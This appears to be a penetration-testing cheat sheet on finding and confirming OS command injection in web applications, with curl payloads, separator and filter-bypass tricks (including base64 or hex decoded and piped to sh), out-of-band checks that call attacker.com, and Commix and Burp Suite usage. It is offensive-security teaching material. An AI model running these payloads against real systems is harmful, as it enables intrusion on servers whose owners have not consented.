Command Injection

January 16, 2026 Command Injection Commix Burpsuite

Command injection detection guide covering OS command injection vulnerabilities in web applications. Learn how to identify injection points, detect command execution, test filter bypasses, and confirm vulnerabilities using manual testing and tools like Commix and Burpsuite.

Command Injection occurs when user input is improperly sanitized and directly passed to system command execution functions, allowing attackers to execute arbitrary operating system commands on the server, potentially leading to full system compromise, data exfiltration, or lateral movement.

Enumeration

Identifying Potential Injection Points

Common injection points:
URL parameters: ?ip=127.0.0.1&host=example.com
POST form data: file uploads, search fields, user input forms
HTTP headers: User-Agent, X-Forwarded-For, Host
Cookie values
API endpoints that process system commands
File upload functionality (filename processing)
Webhooks and callback URLs

Basic injection test:

# Linux/Unix
curl "http://$RHOST/ping?ip=127.0.0.1; whoami"
curl "http://$RHOST/ping?ip=127.0.0.1; id"
curl "http://$RHOST/ping?ip=127.0.0.1; uname -a"

# Windows
curl "http://$RHOST/ping?ip=127.0.0.1; whoami"
curl "http://$RHOST/ping?ip=127.0.0.1; ver"
curl "http://$RHOST/ping?ip=127.0.0.1; hostname"

POST injection:

curl -X POST "http://$RHOST/search" -d "query=test; whoami" -v

Header injection:

curl "http://$RHOST/page" -H "User-Agent: test; whoami" -v
curl "http://$RHOST/page" -H "X-Forwarded-For: 127.0.0.1; id" -v

Time-based testing:

time curl "http://$RHOST/ping?ip=127.0.0.1; sleep 5"

What to look for in responses:

Command execution indicators - Look for:
- Output of system commands in response (username, hostname, file listings)
- Error messages revealing command execution: sh: command not found, 'whoami' is not recognized
- Response time delays (time-based injection)
- Different response content when commands execute
Functionality clues - Applications that may execute commands:
- Network utilities: ping, traceroute, nslookup, dig
- File operations: file uploads, file processing, file downloads
- System information: hostname, uptime, system info pages
- Email functionality: mail sending, email validation
- Backup/restore operations
Error messages - Different errors indicate different OS:
- Linux/Unix: sh: command not found, bash: command not found
- Windows: 'command' is not recognized as an internal or external command
- Error reveals OS typ

Next steps if command execution detected:

Confirm vulnerability by testing multiple commands
Identify operating system from error messages
Test different command separators (OS-specific)
Check for input filtering/encoding
If no output visible, proceed to blind injection detection

Automated Detection

Commix basic test:

commix -u "http://$RHOST/ping?ip=127.0.0.1"
commix -u "http://$RHOST/ping?ip=127.0.0.1" --batch

POST request testing:

commix -u "http://$RHOST/search" --data="query=test"
commix -u "http://$RHOST/search" --data="query=test" -p query

Cookie-based testing:

commix -u "http://$RHOST/page" --cookie="session=abc123"

Burp Suite integration:

# Save request from Burp to file
commix -r request.txt

Burp Suite Active Scanner:

Use Burp Suite Active Scanner with command injection payloads
Configure custom payloads for different OS types
Review scanner results for command execution indicators

Confirming Command Injection

Verifying Command Execution

Confirm with multiple commands:

# Test different commands to confirm injection
curl "http://$RHOST/ping?ip=127.0.0.1; whoami"
curl "http://$RHOST/ping?ip=127.0.0.1; id"
curl "http://$RHOST/ping?ip=127.0.0.1; uname -a"  # Linux/Unix
curl "http://$RHOST/ping?ip=127.0.0.1; hostname"

What to look for to confirm injection:

Command output in response - Username, hostname, or system info appears
Consistent execution - Multiple commands execute successfully
Error messages - OS-specific errors confirm command execution attempt
Response differences - Compare with normal input to identify injected content

Detection confirmation checklist:
Command output visible in response OR
Error messages indicate command execution attempt OR
Time delays confirm command execution (blind injection) OR
Out-of-band channels receive data (DNS/HTTP exfiltration)

Next steps after confirmation:

Proceed to Information Gathering to identify OS and test separators
If no output visible, test blind injection techniques

Time-based testing:

# Linux/Unix
curl "http://$RHOST/ping?ip=127.0.0.1; sleep 5"
curl "http://$RHOST/ping?ip=127.0.0.1; ping -c 5 127.0.0.1"

# Windows
curl "http://$RHOST/ping?ip=127.0.0.1; timeout /t 5"
curl "http://$RHOST/ping?ip=127.0.0.1; ping -n 5 127.0.0.1"

What to look for in responses:

Response time - Measure with time curl:
- Normal request: Typical response time (e.g., 0.1-0.5s)
- Injection successful: Delayed response (5+ seconds)
- Network delays may cause false positives (test multiple times)
Consistent delays - True conditions delay consistently, false conditions respond immediately

Network latency, server load, and other factors can affect response times. Always test multiple times and compare against baseline response times to avoid false positives.

Next steps if blind injection confirmed:

Confirm vulnerability with multiple time-based tests
Test out-of-band channels (DNS, HTTP) to verify command execution
Use Commix with --time-sec for automated blind injection detection
Document proof of concept with timing evidence
Note that blind injection confirms vulnerability even without visible output

Information Gathering

OS Detection

Manual OS fingerprinting:

# Linux/Unix - Test commands that reveal OS
curl "http://$RHOST/ping?ip=127.0.0.1; uname -a"
curl "http://$RHOST/ping?ip=127.0.0.1; cat /etc/os-release"

# Windows - Test commands that reveal OS
curl "http://$RHOST/ping?ip=127.0.0.1; ver"
curl "http://$RHOST/ping?ip=127.0.0.1; systeminfo"

# Check PATH
curl "http://$RHOST/ping?ip=127.0.0.1; echo $PATH"  # Linux
curl "http://$RHOST/ping?ip=127.0.0.1; echo %PATH%"  # Windows

What to look for:

Error messages - Different OS produce different error formats:
- Linux/Unix: sh: command not found, bash: command not found
- Windows: 'command' is not recognized as an internal or external command
Command output - OS-specific commands reveal system type
Path formats - /path/to/file (Unix) vs C:\path\to\file (Windows)

Detection purpose:

Identify OS to use appropriate command separators
Choose OS-specific commands for testing
Understand error message formats for detection

Command Separator Testing

Linux/Unix separators:

# Semicolon (sequential execution)
curl "http://$RHOST/ping?ip=127.0.0.1; whoami"

# Ampersand (background execution)
curl "http://$RHOST/ping?ip=127.0.0.1 & whoami"

# Pipe (command chaining)
curl "http://$RHOST/ping?ip=127.0.0.1 | whoami"

# Newline (command separation)
curl "http://$RHOST/ping?ip=127.0.0.1%0awhoami"

# Logical operators
curl "http://$RHOST/ping?ip=127.0.0.1 && whoami"  # AND
curl "http://$RHOST/ping?ip=127.0.0.1 || whoami"  # OR

Windows separators:

# Ampersand (sequential execution)
curl "http://$RHOST/ping?ip=127.0.0.1 & whoami"

# Semicolon (sequential execution)
curl "http://$RHOST/ping?ip=127.0.0.1; whoami"

# Pipe (command chaining)
curl "http://$RHOST/ping?ip=127.0.0.1 | whoami"

# Double ampersand (AND)
curl "http://$RHOST/ping?ip=127.0.0.1 && whoami"

# Double pipe (OR)
curl "http://$RHOST/ping?ip=127.0.0.1 || whoami"

What to look for in responses:

Separator effectiveness - Test each separator:
- Command output appears in response - Separator works
- No output but no error - May be blind injection
- Error message - Separator filtered or invalid syntax
- Different response time - Time-based injection possible
Multiple separators - Some applications filter specific characters:
- If ; filtered, try | or &
- If & filtered, try ; or newline
- Test URL-encoded versions: %3b, %26, %7c

Next steps if separator works:

Proceed to Filter Detection if injection fails or filters detected

Filter Detection and Bypass

Filtering Detection

Test filtered characters:

# Test common filters
curl "http://$RHOST/ping?ip=127.0.0.1; whoami"
curl "http://$RHOST/ping?ip=127.0.0.1 | whoami"
curl "http://$RHOST/ping?ip=127.0.0.1 & whoami"
curl "http://$RHOST/ping?ip=127.0.0.1 && whoami"
curl "http://$RHOST/ping?ip=127.0.0.1 || whoami"

What to look for in responses:

Filtered characters - Check if input is:
- Completely removed: 127.0.0.1; whoami becomes 127.0.0.1 whoami
- Encoded: ; becomes %3b or <
- Partially filtered: whoami becomes who or ami
- Error messages: “Invalid input” or “Command blocked”
WAF responses - Look for:
- 403 Forbidden status
- WAF challenge pages
- “Blocked” messages in response body
- Rate limiting after multiple attempts

Next steps if filtering detected:

Test encoding bypasses (URL, hex, Unicode) to confirm if injection still possible
Try alternative command separators
Test command substitution techniques
Attempt WAF bypass techniques (case variation, encoding)
If all direct methods fail, test blind injection techniques

Encoding Bypasses

URL encoding:

curl "http://$RHOST/ping?ip=127.0.0.1%3bwhoami"
curl "http://$RHOST/ping?ip=127.0.0.1%26whoami"

Double URL encoding:

curl "http://$RHOST/ping?ip=127.0.0.1%253bwhoami"

Hex encoding:

curl "http://$RHOST/ping?ip=127.0.0.1\x3bwhoami"

# Encode command
echo -n "whoami" | xxd -p  # 77686f616d69
# Execute (if xxd available)
curl "http://$RHOST/ping?ip=127.0.0.1; echo 77686f616d69 | xxd -r -p | sh"

Unicode encoding (if supported):

curl "http://$RHOST/ping?ip=127.0.0.1\u003bwhoami"

Base64 encoding:

# Encode command
echo -n "whoami" | base64  # d2hvYW1p

# Execute encoded command
curl "http://$RHOST/ping?ip=127.0.0.1; echo d2hvYW1p | base64 -d | sh"

Filter Bypass Techniques

Whitespace bypass:

# Tab character
curl "http://$RHOST/ping?ip=127.0.0.1%09whoami"

# Newline
curl "http://$RHOST/ping?ip=127.0.0.1%0awhoami"

# Carriage return
curl "http://$RHOST/ping?ip=127.0.0.1%0dwhoami"

# Form feed
curl "http://$RHOST/ping?ip=127.0.0.1%0cwhoami"

Command concatenation:

# Without spaces
curl "http://$RHOST/ping?ip=127.0.0.1;whoami"
curl "http://$RHOST/ping?ip=127.0.0.1|whoami"

# With IFS (Internal Field Separator)
curl "http://$RHOST/ping?ip=127.0.0.1;\${IFS}whoami"

Case variation:

# Lowercase
curl "http://$RHOST/ping?ip=127.0.0.1; whoami"

# Uppercase
curl "http://$RHOST/ping?ip=127.0.0.1; WHOAMI"

# Mixed case
curl "http://$RHOST/ping?ip=127.0.0.1; WhOaMi"

Advanced Techniques

Command Substitution Testing

Linux/Unix command substitution:

# Backticks
curl "http://$RHOST/ping?ip=\`whoami\`"

# Dollar parentheses
curl "http://$RHOST/ping?ip=\$(whoami)"
curl "http://$RHOST/ping?ip=\$\(whoami\)"

# Nested substitution
curl "http://$RHOST/ping?ip=\$(echo \$(whoami))"

Alternative Command Execution

Wildcard expansion:

# Use wildcards if commands filtered
curl "http://$RHOST/ping?ip=127.0.0.1; /???/??/w??o???"  # /bin/whoami
curl "http://$RHOST/ping?ip=127.0.0.1; /usr/bin/w*"      # whoami

Environment variables:

# Use $PATH
curl "http://$RHOST/ping?ip=127.0.0.1; \$PATH"

# Use $HOME
curl "http://$RHOST/ping?ip=127.0.0.1; echo \$HOME"

Out-of-Band Detection

DNS-based detection:

# Test if commands execute by triggering DNS lookup
curl "http://$RHOST/ping?ip=127.0.0.1; nslookup test.attacker.com"
curl "http://$RHOST/ping?ip=127.0.0.1; dig test.attacker.com"

HTTP-based detection:

# Test if commands execute by triggering HTTP request
curl "http://$RHOST/ping?ip=127.0.0.1; curl http://attacker.com/test"
curl "http://$RHOST/ping?ip=127.0.0.1; wget http://attacker.com/test"

Listener Setup: Before testing out-of-band techniques, ensure you have a listener/server configured to receive the connections. For DNS, configure a DNS server to log queries. For HTTP, set up a web server (python3 -m http.server 8000) or use a service like webhook.site to capture requests.

Common Tools

Commix

Basic usage:

commix -u "http://$RHOST/ping?ip=127.0.0.1" --batch

Comprehensive scan:

commix -u "http://$RHOST/ping?ip=127.0.0.1" --batch --all
commix -u "http://$RHOST/ping?ip=127.0.0.1" --batch --os-cmd="whoami"

With proxy (Burp):

commix -u "http://$RHOST/ping?ip=127.0.0.1" --proxy="http://127.0.0.1:8080"

Blind injection:

commix -u "http://$RHOST/ping?ip=127.0.0.1" --batch --time-sec=5

Detection-focused scan:

# Test and confirm injection without executing OS shell
commix -u "http://$RHOST/ping?ip=127.0.0.1" --batch --test-all

Custom payload testing:

commix -u "http://$RHOST/ping?ip=127.0.0.1" --batch --payload="; COMMAND #"

Burp Suite

Active Scanner:

Configure command injection payloads for detection
Test different OS types (Linux, Windows)
Review scanner results for command execution indicators
Look for command output or error messages in responses

Intruder:

Use for fuzzing command separators
Test filter bypass payloads systematically
Time-based analysis for blind injection detection
Compare response times to identify successful injection

Repeater:

Manual testing of command injection payloads
Test different payloads and encodings
Analyze responses for command output or error messages
Compare responses to identify injection success

Cross-Site Request Forgery (CSRF/XSRF)

Browse Hacknotes

Command Injection

Enumeration

Identifying Potential Injection Points

Automated Detection

Confirming Command Injection

Verifying Command Execution

Blind Injection Detection

Information Gathering

OS Detection

Command Separator Testing

Filter Detection and Bypass

Filtering Detection

Encoding Bypasses

Filter Bypass Techniques

Advanced Techniques

Command Substitution Testing

Alternative Command Execution

Out-of-Band Detection

Common Tools

Commix

Burp Suite